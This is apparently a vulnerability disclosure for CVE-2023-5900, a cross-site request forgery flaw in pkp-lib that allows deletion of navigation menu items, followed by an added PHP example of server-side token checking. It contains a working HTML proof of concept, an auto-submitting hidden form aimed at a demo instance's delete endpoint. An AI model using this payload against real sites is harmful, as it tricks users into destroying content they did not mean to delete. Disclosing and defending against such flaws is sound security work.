Headline
CVE-2023-5900: CSRF Delete Navigation Menu Items in pkp-lib
Cross-Site Request Forgery in GitHub repository pkp/pkp-lib prior to 3.3.0-16.
Description
A CSRF flaw allows deletion of Navigation Menu Items.
Proof of Concept
1. The attacker sends fake requests to users
<html>
<body>
<form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/navigation-menus/navigation-menu-items-grid/delete-navigation-menu-item">
<input type="hidden" name="navigationMenuItemId" value="330" />
<input type="hidden" name="csrfToken" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2. The user clicks and unintentionally deletes Navigation Menu Items
Payload PoC
https://drive.google.com/file/d/15cjZ2oBeBmUx-C9_kRqBXKMXLX8LU5Ew/view?usp=sharing
Video PoC
https://drive.google.com/file/d/1Bp1M3ifN9rXdxhjfyAIibmy0QFhYluEu/view?usp=sharing
Impact
Tricks users into performing unintended actions.
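Server-side validation that would refuse the request built by the form in the Proof of Concept, shown as an added example: it is not pkp-lib code or the project's fix, and the function names issueCsrfToken and rejectReason are hypothetical. It assumes the application keeps a per-session token and compares it against the submitted csrfToken field.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not pkp-lib's API.

/** Create a per-session token (kept server-side and embedded in forms). */
function issueCsrfToken(): string
{
    return bin2hex(random_bytes(32));
}

/**
 * Decide whether a state-changing request may proceed.
 * Returns null when allowed, or a reason string when rejected.
 */
function rejectReason(string $method, ?string $submitted, ?string $sessionToken): ?string
{
    // A form without a method attribute, like the one in the PoC,
    // submits as GET; deletes should only be accepted over POST.
    if (strtoupper($method) !== 'POST') {
        return 'method not allowed';
    }
    // Without a session token there is nothing to compare against.
    if ($sessionToken === null || $sessionToken === '') {
        return 'no session token';
    }
    // The PoC sends csrfToken=""; an empty or missing value is never valid.
    if ($submitted === null || $submitted === '') {
        return 'missing token';
    }
    // Constant-time comparison avoids leaking the token through timing.
    if (!hash_equals($sessionToken, $submitted)) {
        return 'token mismatch';
    }
    return null;
}

// Constructed sample requests (not captured traffic).
$token = issueCsrfToken();
$cases = [
    'PoC form (GET, empty token)' => ['GET', '', $token],
    'POST with empty token'       => ['POST', '', $token],
    'POST with wrong token'       => ['POST', str_repeat('0', 64), $token],
    'legitimate POST'             => ['POST', $token, $token],
];
foreach ($cases as $label => [$method, $submitted, $session]) {
    $reason = rejectReason($method, $submitted, $session);
    printf("%-30s %s\n", $label, $reason === null ? 'allowed' : "rejected: $reason");
}
```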